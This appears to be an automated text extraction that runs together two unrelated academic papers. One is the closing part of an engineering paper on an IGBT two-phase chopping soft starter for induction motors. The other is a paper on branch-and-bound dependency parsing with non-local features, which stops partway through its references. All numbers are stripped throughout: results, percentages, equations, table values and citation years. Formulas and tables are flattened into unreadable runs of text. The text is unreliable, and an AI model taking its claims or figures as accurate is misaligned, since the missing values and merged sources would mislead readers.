fig. , it can be shown from the diagram that the stator current fluctuation is significantly decreased than that of thyristor regulating soft start, and the biggest stator current is about times than that of stable operation when starts [ - ] . figure. the stator current simulation result of two phase chopping regulating soft starter fig. is the speed and torque simulation results of two phase chopping regulating all control type soft starter. it can be reflected: the revolving speed of two phase chopping regulating all control type soft starter rises faster, and the rising process is smoother. the time to stabilization is also ahead of thyristor regulating soft starter. the starting torque of two phase chopping regulating all control type soft starter is smoother, there’s no peak impact torque. fig. is the stator current local amplification figure of two phase chopping regulating all control type soft starter. it can indicated from the picture that as igbt works under the high switch frequency, the stator current waveform is very close to the sine wave, and the stator current is continuous. discontinuous phenomenon hardly appears for a while near zero. figure. the speed and torque simulation results of two phase chopping regulating soft starter figure. the stator current local amplification figure of two phase chopping regulating soft starter international journal of advanced network monitoring and controls volume , no. , fig. is the fft analysis of two phase chopping regulating soft starter a phase stator current simulation results. it can be presented that the main harmonic frequency is , , , , and the total harmonic factor is only . %, compared with thyristor regulating soft start. the total harmonic factor has fallen by half. the harmonic content of and is higher, and they belong to higher harmonic, easy to be filtered through the filter circuit. figure. the fft analysis of two phase chopping regulating soft starter a phase stator current through the analysis of simulation results, it confirms that the two phase chopping regulating all control type soft starter has the advantages: small starting current, smooth starting torque, low total harmonic content, and low harmonic content, compared with thyristor regulating soft starter. . the hardware circuit design of two phase chopping regulating all control type soft starter the hardware schematic diagram of two phase chopping regulating soft starter is shown in fig. . it mainly includes several main parts: the main control chip stm [ ], communication circuit, current detection circuit, usb to serial communication circuit, the cpld circuit, voltage detection circuit, drive circuit, power circuit. every subcircuit needs to be connected with the corresponding power supply circuit, without showing the specific connection in the picture. figure. the schematic diagram of two phase chopping regulating soft starter drive circuit communication circuit usb to serial communication circuit current detection circuit the main control chip stm voltage detection circuit cpld circuit the design of two phase chopping regulation voltage soft starter . the software design of two phase chopping regulating all control type soft start system . the design of main program as the central control system, two phase chopping regulating soft start main program, has command and deployment effects to the behavior of each program of the control system .the main program flow chart of control system is shown in fig. . simple its structure is, it is the soul of the whole control system, and has irreplaceable importance. the detailed working process is displayed below. figure. the main program flow chart of control system first of all, the control system must initialize the main control chip internal various registers and each external pin operation after power-on. then run a series of system detection subroutines by reading the corresponding parameters of pin, to judge whether the current environment of the motor could start. the operation of the main subroutines on the stage includes phase sequence detection, lack of phase detection, temperature detection. if the detect results conform to the motor starting, it will enter to scan key link. this link uses to monitor whether the control signals are input by the human through the keyboard. if so, the process enters the key processing steps, then the relevant subroutines process the control of the input signal, and wait for starting. if the output of detection subroutines does not conform to the motor starting, the system will enter the fault process which will be displayed. after the fault processed, test whether it conforms to the motor starting conditions. . the design of main program current-limiting starting mode is a more detailed starting mode, which highlights the current size start initializati on fault? fault process and display key scan system check key process yes no yes no international journal of advanced network monitoring and controls volume , no. , control in the process of motor starting. it needs to feedback the real-time current to the main control system in the process of motor starting , then by the comparing the value of the real-time current with the set current, the main control system generates control signal, adjusts the igbt trigger pulse duty ratio, and then makes the motor starting current near the set value within a range. this way of starting is relatively complex. figure. flow chart of current limiting soft start the biggest starting current of the current-limiting starting is generally no more than four times of the electric motor rated current. usually the current limit control algorithm has pid method, fuzzy control method, the combination of pid and fuzzy control method, and so on. this article uses the fuzzy control method. flow chart of current limiting soft start is shown in fig. . . conclusion this paper proposes the two phase chopping regulating all control type soft starter. its starting current, starting torque, total harmonic content and the stator current waveform, are all superior to the thyristor voltage regulating soft starter. the paper proposed the hardware circuit and the software program of the two phase chopping regulating all control type soft starter. the harmonic content of the two phase chopping regulating all control type soft starter is lower. compared with thyristor regulating soft starter, the starting current is closer to the sine wave, and with good continuity, control algorithm is simple, the protection circuit is complete, the system has high stability and easy maintenance, and large starting < initialization read the set value compared with the set value reduce the duty ratio > start end the start over yes no keep whether reach ms no increase the duty ratio delay read the current value delay read the current value compared with the set value keep = < stop and report the fault = > yes set the duty ratio size the design of two phase chopping regulation voltage soft starter torque is continuous adjustable. with use less of power electronic devices, the equipment controls the two phase to achieve the purpose of control three phase, saving costs. it’s a method of ac asynchronous motor soft start worth promoting. acknowledgment the authors wish to thank shaanxi provincial government. this work was supported in part by industrial research project of science and technology department of shaanxi province. fund number: gy . reference [ ] hu hongming, “the study of asynchronous motor soft start”, master thesis, huazhong university of science and technology, wuhan, china. june , . [ ] sun jinji, fang jiancheng, wang jianmin, “the shock in the process of asynchronous motor soft start”, transactions of china electrotechnical society,vol. , pp. - , february . [ ] fan liping, zhang liang, “fuzzy simulation of asynchronous motor soft start”, transactions of power system and automation, vol. , pp. - , march . [ ] fan liping, hu wenhao, “the study of combination of filtering function asynchronous motor soft start”, electric drive, vol. , pp. - , september . [ ] meng yanjing, gong wenzhan, “the hardware design of the intelligent soft starter control system”, small & special electrical machines, vol. , pp. - , january . [ ] shicheng zheng, hong zhu, xiaohu cao, weihua wu, qianzhi zhou, “research and implementation of a novel single phase ac/ac variable frequency technology”, high voltage engineering, vol. , pp. - , march . [ ] g.zenginobuz, i.cadirci, m.ermis, c.barlak, “soft starting of large induction motors at constant current with minimized starting torque pulsations”, ieee industry applications conference, vol. , pp. - , march . [ ] xiuhua zhang, lin he, guangxi li, zhou zhou, “the analysis of structure strength and calculation of critical speed of a new type of high-speed permanent magnet motor”, energy education science and technology part a, vol. , pp. - , january . [ ] yunrui wang, “study on electric furnace power quality integrated control system”, energy education science and technology part a, vol. , pp. - , february . [ ] zhongxian wang, yonggeng wei, chunyan li, “study on apfc circuit in the single-phase variable frequency power supply”, energy education science and technology part a, vol. , pp. - , january . transactions of the association for computational linguistics, ( ) – . action editor: ryan mcdonald. submitted / ; revised / ; published / . c© association for computational linguistics. branch and bound algorithm for dependency parsing with non-local features xian qian and yang liu computer science department the university of texas at dallas {qx,yangl}@hlt.utdallas.edu abstract graph based dependency parsing is inefficient when handling non-local features due to high computational complexity of inference. in this paper, we proposed an exact and effi- cient decoding algorithm based on the branch and bound (b&b) framework where non- local features are bounded by a linear combi- nation of local features. dynamic program- ming is used to search the upper bound. ex- periments are conducted on english ptb and chinese ctb datasets. we achieved competi- tive unlabeled attachment score (uas) when no additional resources are available: . % for english and . % for chinese. parsing speed is words per second for english and words per second for chinese. our algo- rithm is general and can be adapted to non- projective dependency parsing or other graph- ical models. introduction for graph based projective dependency parsing, dy- namic programming (dp) is popular for decoding due to its efficiency when handling local features. it performs cubic time parsing for arc-factored mod- els (eisner, ; mcdonald et al., a) and bi- quadratic time for higher order models with richer sibling and grandchild features (carreras, ; koo and collins, ). however, for models with gen- eral non-local features, dp is inefficient. there have been numerous studies on global in- ference algorithms for general higher order parsing. one popular approach is reranking (collins, ; charniak and johnson, ; hall, ). it typi- cally has two steps: the low level classifier gener- ates the top k hypotheses using local features, then the high level classifier reranks these candidates us- ing global features. since the reranking quality is bounded by the oracle performance of candidates, some work has combined candidate generation and reranking steps using cube pruning (huang, ; zhang and mcdonald, ) to achieve higher or- acle performance. they parse a sentence in bottom up order and keep the top k derivations for each s- pan using k best parsing (huang and chiang, ). after merging the two spans, non-local features are used to rerank top k combinations. this approach is very efficient and flexible to handle various non- local features. the disadvantage is that it tends to compute non-local features as early as possible so that the decoder can utilize that information at inter- nal spans, hence it may miss long historical features such as long dependency chains. smith and eisner modeled dependency parsing using markov random fields (mrfs) with glob- al constraints and applied loopy belief propaga- tion (lbp) for approximate learning and inference (smith and eisner, ). similar work was done for combinatorial categorial grammar (ccg) pars- ing (auli and lopez, ). they used posterior marginal beliefs for inference to satisfy the tree con- straint: for each factor, only legal messages (satisfy- ing global constraints) are considered in the partition function. a similar line of research investigated the use of integer linear programming (ilp) based parsing (riedel and clarke, ; martins et al., ). this method is very expressive. it can handle arbitrary non-local features determined or bounded by linear inequalities of local features. for local models, lp is less efficient than dp. the reason is that, dp works on a small number of dimensions in each recursion, while for lp, the popular revised simplex method needs to solve a m dimensional linear system in each iteration (nocedal and wright, ), where m is the number of constraints, which is quadratic in sentence length for projective dependency pars- ing (martins et al., ). dual decomposition (dd) (rush et al., ; koo et al., ) is a special case of lagrangian re- laxation. it relies on standard decoding algorithms as oracle solvers for sub-problems, together with a simple method for forcing agreement between the different oracles. this method does not need to con- sider the tree constraint explicitly, as it resorts to dy- namic programming which guarantees its satisfac- tion. it works well if the sub-problems can be well defined, especially for joint learning tasks. howev- er, for the task of dependency parsing, using various non-local features may result in many overlapped sub-problems, hence it may take a long time to reach a consensus (martins et al., ). in this paper, we propose a novel branch and bound (b&b) algorithm for efficient parsing with various non-local features. b&b (land and doig, ) is generally used for combinatorial optimiza- tion problems such as ilp. the difference between our method and ilp is that the sub-problem in ilp is a relaxed lp, which requires a numerical solution, while ours bounds the non-local features by a lin- ear combination of local features and uses dp for decoding as well as calculating the upper bound of the objective function. an exact solution is achieved if the bound is tight. though in the worst case, time complexity is exponential in sentence length, it is practically efficient especially when adopting a pruning strategy. experiments are conducted on english penntree bank and chinese tree bank (ctb ) with stan- dard train/develop/test split. we achieved . % unlabeled attachment score (uas) for english at a speed of words per second and . % for chi- nese at a speed of words per second. graph based parsing . problem definition given a sentence x = x ,x , . . . ,xn where xi is the ith word of the sentence, dependency parsing as- signs exactly one head word to each word, so that dependencies from head words to modifiers form a tree. the root of the tree is a special symbol de- noted by x which has exactly one modifier. in this paper, we focus on unlabeled projective dependency parsing but our algorithm can be adapted for labeled or non-projective dependency parsing (mcdonald et al., b). the inference problem is to search the optimal parse tree y∗ y∗ = arg maxy∈y(x)ϕ(x,y) where y(x) is the set of all candidate parse trees of sentence x. ϕ(x,y) is a given score function which is usually decomposed into small parts ϕ(x,y) = ∑ c⊆y ϕc(x) ( ) where c is a subset of edges, and is called a factor. for example, in the all grandchild model (koo and collins, ), the score function can be represented as ϕ(x,y) = ∑ ehm∈y ϕehm (x) + ∑ egh,ehm∈y ϕegh,ehm (x) where the first term is the sum of scores of all edges xh → xm, and the second term is the sum of the scores of all edge chains xg → xh → xm. in discriminative models, the score of a parse tree y is the weighted sum of the fired feature functions, which can be represented by the sum of the factors ϕ(x,y) = wt f (x,y) = ∑ c⊆y wt f (x,c) = ∑ c⊆y ϕc(x) where f (x,c) is the feature vector that depends on c. for example, we could define a feature for grand- child c = {egh,ehm} f(x,c) =    if xg = would ∧ xh = be ∧xm = happy ∧ c is selected otherwise . dynamic programming for local models in first order models, all factors c in eq( ) contain a single edge. the optimal parse tree can be derived by dp with running time o(n ) (eisner, ). the algorithm has two types of structures: complete s- pan, which consists of a headword and its descen- dants on one side, and incomplete span, which con- sists of a dependency and the region between the head and modifier. it starts at single word spans, and merges the spans in bottom up order. for second order models, the score function ϕ(x,y) adds the scores of siblings (adjacent edges with a common head) and grandchildren ϕ(x,y) = ∑ ehm∈y ϕehm (x) + ∑ egh,ehm∈y ϕehm,egh (x) + ∑ ehm,ehs∈y ϕehm,ehs (x) there are two versions of second order models, used respectively by carreras ( ) and koo et al. ( ). the difference is that carreras’ only con- siders the outermost grandchildren, while koo and collin’s allows all grandchild features. both models permit o(n ) running time. third-order models score edge triples such as three adjacent sibling modifiers, or grand-siblings that score a word, its modifier and its adjacent grand- children, and the inference complexity is o(n ) (koo and collins, ). in this paper, for all the factors/features that can be handled by dp, we call them the local fac- tors/features. the proposed method . basic idea for general high order models with non-local fea- tures, we propose to use branch and bound (b&b) algorithm to search the optimal parse tree. a b&b algorithm has two steps: branching and bounding. the branching step recursively splits the search s- pace y(x) into two disjoint subspaces y(x) = y ∪ y by fixing assignment of one edge. for each subspace yi, the bounding step calculates the upper bound of the optimal parse tree score in the sub- space: ubyi ≥ maxy∈yi ϕ(x,y). if this bound is no more than any obtained parse tree score ubyi ≤ ϕ(x,y′), then all parse trees in subspace yi are no more optimal than y′, and yi could be pruned safely. the efficiency of b&b depends on the branching strategy and upper bound computation. for exam- ple, sun et al. ( ) used b&b for mrfs, where they proposed two branching strategies and a novel data structure for efficient upper bound computation. klenner and ailloud ( ) proposed a variation of balas algorithm (balas, ) for coreference reso- lution, where candidate branching variables are sort- ed by their weights. our bounding strategy is to find an upper bound for the score of each non-local factor c containing multiple edges. the bound is the sum of new scores of edges in the factor plus a constant ϕc(x) ≤ ∑ e∈c ψe(x) + αc based on the new scores {ψe(x)} and constants {αc}, we define the new score of parse tree y ψ(x,y) = ∑ c⊆y ( ∑ e∈c ψe(x) + αc ) then we have ψ(x,y) ≥ ϕ(x,y), ∀y ∈ y(x) the advantage of such a bound is that, it is the sum of new edge scores. hence, its optimum tree maxy∈y(x) ψ(x,y) can be found by dp, which is the upper bound of maxy∈y(x) ϕ(x,y), as for any y ∈ y(x), ψ(x,y) ≥ ϕ(x,y). . the upper bound function in this section, we derive the upper bound function ψ(x,y) described above. to simplify notation, we drop x throughout the rest of the paper. let zc be a binary variable indicating whether factor c is se- lected in the parse tree. we reformulate the score function in eq( ) as ϕ(y) ≡ ϕ(z) = ∑ c ϕczc ( ) correspondingly, the tree constraint is replaced by z ∈ z. then the parsing task is z∗ = arg maxz∈zϕczc ( ) notice that, for any zc, we have zc = min e∈c ze which means that factor c appears in parse tree if and only if all its edges {e|e ∈ c} are selected in the tree. here ze is short for z{e} for simplicity. our bounding method is based on the following fact: for a set {a ,a , . . .ar} (aj denotes the jth el- ement) , its minimum min{aj} = min p∈∆ ∑ j pjaj ( ) where ∆ is probability simplex ∆ = {p|pj ≥ , ∑ j pj = } we discuss the bound for ϕczc in two cases: ϕc ≥ and ϕc < . if ϕc ≥ , we have ϕczc = ϕc min e∈c ze = ϕc min pc∈∆ ∑ e∈c pecze = min pc∈∆ ∑ e∈c ϕcp e cze the second equation comes from eq( ). for sim- plicity, let gc(pc,z) = ∑ e∈c ϕcp e cze with domain domgc = {pc ∈ ∆; ze ∈ { , }, ∀e ∈ c}. then we have ϕczc = min pc gc(pc,z) ( ) if ϕc < , we have two upper bounds. one is commonly used in ilp when all the variables are bi- nary a∗ = min j {aj}rj= ⇔ a∗ ≤ aj a∗ ≥ ∑ j aj − (r − ) according to the last inequality, we have the upper bound for negative scored factors ϕczc ≤ ϕc ( ∑ e∈c ze − (rc − ) ) ( ) where rc is the number of edges in c. for simplicity, we use the notation σc(z) = ϕc ( ∑ e∈c ze − (rc − ) ) the other upper bound when ϕc < is simple ϕczc ≤ ( ) notice that, for any parse tree, one of the upper bounds must be tight. eq( ) is tight if c appears in the parse tree: zc = , otherwise eq( ) is tight. therefore ϕczc = min {σc(z), } let hc(pc,z) = p cσc(z) + p c · with domhc = {pc ∈ ∆; ze ∈ { , }, ∀e ∈ c}. according to eq( ), we have ϕczc = min pc hc(pc,z) ( ) let ψ(p,z) = ∑ c,ϕc≥ gc(pc,z) + ∑ c,ϕc< hc(pc,z) minimize ψ with respect to p, we have min p ψ(p,z) = min p   ∑ c,ϕc≥ gc(pc,z) + ∑ c,ϕc< hc(pc,z)   = ∑ c,ϕc≥ min pc gc(pc,z) + ∑ c,ϕc< min pc hc(pc,z) = ∑ c,ϕc≥ ϕczc + ∑ c,ϕc< ϕczc = ϕ(z) the second equation holds since, for any two fac- tors, c and c′, gc (or hc) and gc′ (or hc′ ) are separable. the third equation comes from eq( ) and eq( ). based on this, we have the following proposition: proposition . for any p,pc ∈ ∆, and z ∈ z, ψ(p,z) ≥ ϕ(z). therefore, ψ(p,z) is an upper bound function of ϕ(z). furthermore, fixing p, ψ(p,z) is a linear func- tion of ze , see eq( ) and eq( ), variables zc for large factors are eliminated. hence z′ = arg maxzψ(p,z) can be solved efficiently by dp. because ψ(p,z′) ≥ ψ(p,z∗) ≥ ϕ(z∗) ≥ ϕ(z′) after obtaining z′ , we get the upper bound and lower bound of ϕ(z∗): ψ(p,z′) and ϕ(z′). the upper bound is expected to be as tight as pos- sible. using min-max inequality, we get max z∈z ϕ(z) = max z∈z min p ψ(p,z) ≤ min p max z∈z ψ(p,z) which provides the tightest upper bound of ϕ(z∗). since ψ is not differentiable w.r.t p, projected sub-gradient (calamai and moré, ; rush et al., ) is used to search the saddle point. more specifically, in each iteration, we first fix p and search z using dp, then we fix z and update p by pnew = p∆ ( p + ∂ψ ∂p α ) where α > is the step size in line search, function p∆(q) denotes the projection of q onto the proba- bility simplex ∆. in this paper, we use euclidean projection, that is p∆(q) = min p∈∆ ∥p − q∥ which can be solved efficiently by sorting (duchi et al., ). . branch and bound based parsing as discussed in section . , the b&b recursive pro- cedure yields a binary tree structure called branch and bound tree. each node of the b&b tree has some fixed ze, specifying some must-select edges and must-remove edges. the root of the b&b tree has no constraints, so it can produce all possible parse trees including z∗. each node has two chil- dren. one adds a constraint ze = for a free edge z =e z =e ψ φ = = ψ<lb ψ φ = = ψ φ = = ψ φ = = ψ φ = = ψ φ = = ψ φ = = min p max z∈z ze = ze = ψ(p,z) figure : a part of b&b tree. ϕ,ψ are short for ϕ(z′) and ψ(p′,z′) respectively. for each node, some edges of the parse tree are fixed. all parse trees that satisfy the fixed edges compose the subset of s ⊆ z. a min-max problem is solved to get the upper bound and lower bound of the optimal parse tree over s. once the upper bound ψ is less than lb, the node is removed safely. e and the other fixes ze = . we can explore the search space {z|ze ∈ { , }} by traversing the b&b tree in breadth first order. let s ⊆ z be subspace of parse trees satisfying the constraint, i.e., in the branch of the node. for each node in b&b tree, we solve p′,z′ = arg min p max z∈s ψ(p,z) to get the upper bound and lower bound of the best parse tree in s. a global lower bound lb is main- tained which is the maximum of all obtained lower bounds. if the upper bound of the current node is lower than the global lower bound, the node can be pruned from the b&b tree safely. an example is shown in figure . when the upper bound is not tight: ψ > lb, we need to choose a good branching variable to gener- ate the child nodes. let g(z′) = ψ(p′,z′) − ϕ(z′) denote the gap between the upper bound and lower bound. this gap is actually the accumulated gaps of all factors c. let gc be the gap of c gc = { gc(p ′ c,z ′) − ϕcz′c if ϕc ≥ hc(p ′ c,z ′) − ϕcz′c if ϕc < we choose the branching variable heuristically: for each edge e, we define its gap as the sum of the gaps of factors that contain it ge = ∑ c,e∈c gc the edge with the maximum gap is selected as the branching variable. suppose there are n nodes on a level of b&b tree, and correspondingly, we get n branching vari- ables, among which, we choose the one with the highest lower bound as it likely reaches the optimal value faster. . lower bound initialization a large lower bound is critical for efficient pruning. in this section, we discuss an alternative way to ini- tialize the lower bound lb. we apply the similar trick to get the lower bound function of ϕ(z). similar to eq( ), for ϕc ≥ , we have ϕczc = max{ϕc ( ∑ e∈c ze − (rc − ) ) , } = max{σc(z), } using the fact that max{aj} = max p∈∆ ∑ j pjaj we have ϕczc = max pc∈∆ p cσc(z) + p c · = max pc hc(pc,z) for ϕc < , we have ϕczc = max e∈c {ϕcze} = max pc∈∆ ∑ e∈c pecϕcze = max pc gc(pc,z) put the two cases together, we get the lower bound function π(p,z) = ∑ c,ϕc≥ hc(pc,z) + ∑ c,ϕc< gc(pc,z) algorithm branch and bound based parsing require: {ϕc} ensure: optimal parse tree z∗ solve p∗,z∗ = arg maxp,zπ(p,z) initialize s = {z}, lb = π(p∗,z∗) while s ̸= ∅ do set s′ = ∅{nodes that survive from pruning} foreach s ∈ s solve minp maxz ψ(p,z) to get lbs,ubs lb = max{lb,lbs∈s }, update z∗ foreach s ∈ s, add s to s′, if ubs > lb select a branching variable ze. clear s = ∅ foreach s ∈ s′ add s = {z|z ∈ s,ze = } to s add s = {z|z ∈ s,ze = } to s. end while for any p,pc ∈ ∆,z ∈ z π(p,z) ≤ ϕ(z) π(p,z) is not concave, however, we could alterna- tively optimize z and p to get a good approximation, which provides a lower bound for ϕ(z∗). . summary we summarize our b&b algorithm in algorithm . it is worth pointing out that so far in the above description, we have used the assumption that the backbone dp uses first order models, however, the backbone dp can be the second or third order ver- sion. the difference is that, for higher order dp, higher order factors such as adjacent siblings, grand- children are directly handled as local factors. in the worst case, all the edges are selected for branching, and the complexity grows exponentially in sentence length. however, in practice, it is quite efficient, as we will show in the next section. experiments . experimental settings the datasets we used are the english penn tree bank (ptb) and chinese tree bank . (ctb ). we use the standard train/develop/test split as described in table . we extracted dependencies using joakim nivre’s penn malt tool with standard head rules: yamada and matsumoto’s (yamada and matsumoto, ) train develop test ptb sec. - sec. sec. ctb sec. - sec. - sec. - - - - table : data split in our experiment for english, and zhang and clark’s (zhang and clark, ) for chinese. unlabeled attachment s- core (uas) is used to evaluate parsing quality . the b&b parser is implemented with c++. all the ex- periments are conducted on the platform intel core i - cpu . ghz. . baseline: dp based second order parser we use the dynamic programming based second or- der parser (carreras, ) as the baseline. aver- aged structured perceptron (collins, ) is used for parameter estimation. we determine the number of iterations on the validation set, which is for both corpora. for english, we train the pos tagger using linear chain perceptron on training set, and predict pos tags for the development and test data. the parser is trained using the automatic pos tags generated by fold cross validation. for chinese, we use the gold standard pos tags. we use five types of features: unigram features, bigram features, in-between features, adjacent sib- ling features and outermost grand-child features. the first three types of features are firstly introduced by mcdonald et al. ( a) and the last two type- s of features are used by carreras ( ). all the features are the concatenation of surrounding words, lower cased words (english only), word length (chi- nese only), prefixes and suffixes of words (chinese only), pos tags, coarse pos tags which are derived from pos tags using a simple mapping table, dis- tance between head and modifier, direction of edges. for english, we used feature templates to gener- ate large amounts of features, and finally got . m non-zero weighted features after training. the base- line parser got . % uas on the testing set. for chinese, we used feature templates, and finally got . m non-zero weighted features after train- for english, we follow koo and collins ( ) and ignore any word whose gold-standard pos tag is one of { “ ” : , .}. for chinese, we ignore any word whose pos tag is pu. ing. the baseline parser got . % uas on the testing set. . b&b based parser with non-local features we use the baseline parser as the backbone of our b&b parser. we tried different types of non-local features as listed below: • all grand-child features. notice that this fea- ture can be handled by koo’s second order model (koo and collins, ) directly. • all great grand-child features. • all sibling features: all the pairs of edges with common head. an example is shown in fig- ure . • all tri-sibling features: all the -tuples of edges with common head. • comb features: for any word with more than consecutive modifiers, the set of all the edges from the word to the modifiers form a comb. • hand crafted features: we perform cross val- idation on the training data using the baseline parser, and designed features that may correc- t the most common errors. we designed hand-craft features for english in total. one ex- ample is shown in figure . for chinese, we did not add any hand-craft features, as the er- rors in the cross validation result vary a lot, and we did not find general patterns to fix them. . implementation details to speed up the solution of the min-max subprob- lem, for each node in the b&b tree, we initialize p with the optimal solution of its parent node, since the child node fixes only one additional edge, its op- timal point is likely to be closed to its parent’s. for the root node of b&b tree, we initialize pec = rc for factors with non-negative weights and p c = for in fact, our algorithm can deal with non-consecutive mod- ifiers; however, in such cases, factor detection (detect regular expressions like x . ∗ x . ∗ . . . ) requires the longest com- mon subsequence algorithm (lcs), which is time-consuming if many comb features are generated. similar problems arise for sub-tree features, which may contain many non-consecutive words. c c c c c h c c c h c c c h c c c h c c h c c h c c h second order higher order figure : an example of all sibling features. top: a sub-tree; bottom: extracted sibling features. ex- isting higher order dp systems can not handle the siblings on both sides of head. regulation occurs through inaction , rather than through ... figure : an example of hand-craft feature: for the word sequence a . . . rather than a, where a is a preposition, the first a is the head of than, than is the head of rather and the second a. negative weighted factors. step size α is initialized with maxc,ϕc ̸= { |ϕc| }, as the vector p is bounded in a unit box. α is updated using the same strategy as rush et al. ( ). two stopping criteria are used. one is ≤ ψold − ψnew ≤ ϵ, where ϵ > is a given precision . the other checks if the bound is tight: ub = lb. because all features are boolean (note that they can be integer), their weights are integer during each perceptron update, hence the scores of parse trees are discrete. the minimal gap between different scores is n×t after averaging, where n is the number of training samples, and t is the itera- tion number for perceptron training. therefore the upper bound can be tightened as ub = ⌊ntψ⌋ nt . during testing, we use the pre-pruning method as used in martins et al. ( ) for both datasets to bal- ance parsing quality and speed. this method uses a simple classifier to select the top k candidate head- s for each word and exclude the other heads from search space. in our experiment, we set k = . we use ϵ = − in our implementation system ptb ctb our baseline . . b&b +all grand-child . . +all great grand-child . . +all sibling . . +all tri-sibling . . +comb . . +hand craft . n/a +all grand-child + all sibling + com- b + hand craft . . rd order re-impl. . . turboparser (reported) . n/a turboparser (our run) . . koo and collins ( ) . n/a zhang and mcdonald ( ) . . zhang and nivre ( ) . . system integration bohnet and kuhn ( ) . . systems using additional resources suzuki et al. ( ) . n/a koo et al. ( ) . n/a chen et al. ( ) . n/a table : comparison between our system and the- state-of-art systems. . main result experimental results are listed in table . for com- parison, we also include results of representative state-of-the-art systems. for the third order pars- er, we re-implemented model (koo and collins, ), and removed the longest sentence in the ctb dataset, which contains words, due to the o(n ) space complexity . for ilp based parsing, we used turboparser , a speed-optimized parser toolkit. we trained full models (which use all grandchild fea- tures, all sibling features and head bigram features (martins et al., )) for both datasets using its de- fault settings. we also list the performance in its documentation on english corpus. the observation is that, the all-sibling features are most helpful for our parser, as some good sibling features can not be encoded in dp based parser. for example, a matched pair of parentheses are always siblings, but their head may lie between them. an- in fact, koo’s algorithm requires only o(n ) space. our implementation is o(n ) because we store the feature vectors for fast training. http://www.ark.cs.cmu.edu/turboparser/ other observation is that all great grandchild features and all tri-sibling features slightly hurt the perfor- mance and we excluded them from the final system. when no additional resource is available, our parser achieved competitive performance: . % unlabeled attachment score (uas) for english at a speed of words per second and . % for chinese at a speed of words per second. high- er uas is reported by joint tagging and parsing (bohnet and nivre, ) or system integration (bohnet and kuhn, ) which benefits from both transition based parsing and graph based parsing. previous work shows that combination of the two parsing techniques can learn to overcome the short- comings of each non-integrated system (nivre and mcdonald, ; zhang and clark, ). sys- tem combination will be an interesting topic for our future research. the highest reported performance on english corpus is . %, obtained by semi- supervised learning with a large amount of unla- beled data (suzuki et al., ). . tradeoff between accuracy and speed in this section, we study the trade off between ac- curacy and speed using different pre-pruning setups. in table , we show the parsing accuracy and in- ference time in testing stage with different numbers of candidate heads k in pruning step. we can see that, on english dataset, when k ≥ , our pars- er could gain − times speedup without losing much parsing accuracy. there is a further increase of the speed with smaller k, at the cost of some ac- curacy. compared with turboparser, our parser is less efficient but more accurate. zhang and mcdon- ald ( ) is a state-of-the-art system which adopts cube pruning for efficient parsing. notice that, they did not use pruning which seems to increase parsing speed with little hit in accuracy. moreover, they did labeled parsing, which also makes their speed not directly comparable. for each node of b&b tree, our parsing algorithm uses projected sub-gradient method to find the sad- dle point, which requires a number of calls to a dp, hence the efficiency of algorithm is mainly deter- mined by the number of dp calls. figure and fig- ure show the averaged parsing time and number of calls to dp relative to the sentence length with differ- ent pruning settings. parsing time grows smoothly ptb ctb system uas w/s uas w/s ours (no prune) . . ours (k = ) . . ours (k = ) . . ours (k = ) . . ours (k = ) . . turboparser(full) . . turboparser(standard) . . turboparser(basic) . . zhang and mcdon- ald ( )† . . n/a table : trade off between parsing accuracy (uas) and speed (words per second) with different pre- pruning settings. k denotes the number of candi- date heads of each word preserved for b&b parsing. †their speed is not directly comparable as they per- forms labeled parsing without pruning. when sentence length ≤ . there is some fluctua- tion for the long sentences. this is because there are very few sentences for a specific long length (usual- ly or sentences), and the statistics are not stable or meaningful for the small samples. without pruning, there are in total , calls to parse , english sentences, that is, each sen- tence requires . calls on average. for chinese, there are , calls for , sentences, i.e., . calls for each sentence on average. discussion . polynomial non-local factors our bounding strategy can handle a family of non- local factors that can be expressed as a polynomial function of local factors. to see this, suppose zc = ∑ i αi ∏ e∈ei ze for each i, we introduce new variable zei = mine∈ei ze. because ze is binary, zei = ∏ e∈ei ze. in this way, we replace zc by several zei that can be handled by our bounding strategy. we give two examples of these polynomial non- local factors. first is the or of local factors: zc = max{ze,z′e}, which can be expressed by zc = ze + z′e−zez′e. the second is the factor of valency feature p a rs in g t im e ( se c. ) sentence length k= k= k= k= no prune (a) ptb corpus p a rs in g t im e ( se c. ) sentence length k= k= k= k= no prune (b) ctb corpus figure averaged parsing time (seconds) relative to sentence length with different pruning settings, k denotes the number of candidate heads of each word in pruning step. c a lls t o d p sentence length k= k= k= k= no prune (a) ptb corpus c a lls t o d p sentence length k= k= k= k= no prune (b) ctb corpus figure averaged number of calls to dp relative to sentence length with different pruning settings, k denotes the number of candidate heads of each word in pruning step. (martins et al., ). let binary variable vik indi- cate whether word i has k modifiers. given {ze} for the edges with head i, then {vik|k = , . . . ,n − } can be solved by ∑ k kjvik = ( ∑ e ze )j ≤ j ≤ n − the left side of the equation is the linear function of vik. the right side of the equation is a polynomial function of ze. hence, vik could be expressed as a polynomial function of ze. . k best parsing though our b&b algorithm is able to capture a va- riety of non-local features, it is still difficult to han- dle many kinds of features, such as the depth of the parse tree. hence, a reranking approach may be use- ful in order to incorporate such information, where k parse trees can be generated first and then a second pass model is used to rerank these candidates based on more global or non-local features. in addition, k-best parsing may be needed in many applications to use parse information and especially utilize infor- mation from multiple candidates to optimize task- specific performance. we have not conducted any experiment for k best parsing, hence we only dis- cuss the algorithm. according to proposition , we have proposition . given p and subset s ⊆ z, let zk denote the kth best solution of maxz∈s ψ(p,z). if a parse tree z′ ∈ s satisfies ϕ(z′) ≥ ψ(p,zk), then z′ is one of the k best parse trees in subset s. proof. since zk is the kth best solution of ψ(p,z), for zj, j > k, we have ψ(p,zk) ≥ ψ(p,zj) ≥ ϕ(zj). since the size of the set {zj|j > k} is |s| − k, hence there are at least |s| − k parse trees whose scores ϕ(zj) are less than ψ(p,zk). because ϕ(z′) ≥ ψ(p,zk), hence z′ is at least the kth best parse tree in subset s. therefore, we can search the k best parse trees in this way: for each sub-problem, we use dp to derive the k best parse trees. for each parse tree z, if ϕ(z) ≥ ψ(p,zk), then z is selected into the k best set. algorithm terminates until the kth bound is tight. conclusion in this paper we proposed a new parsing algorithm based on a branch and bound framework. the mo- tivation is to use dynamic programming to search for the bound. experimental results on ptb and ctb datasets show that our method is competitive in terms of both performance and efficiency. our method can be adapted to non-projective dependen- cy parsing, as well as the k best mst algorithm (hall, ) to find the k best candidates. acknowledgments we’d like to thank hao zhang, andre martins and zhenghua li for their helpful discussions. we al- so thank ryan mcdonald and three anonymous re- viewers for their valuable comments. this work is partly supported by darpa under contract no. hr - -c- and fa - - - . any opinions expressed in this material are those of the authors and do not necessarily reflect the views of darpa. references michael auli and adam lopez. . a comparison of loopy belief propagation and dual decomposition for integrated ccg supertagging and parsing. in proc. of 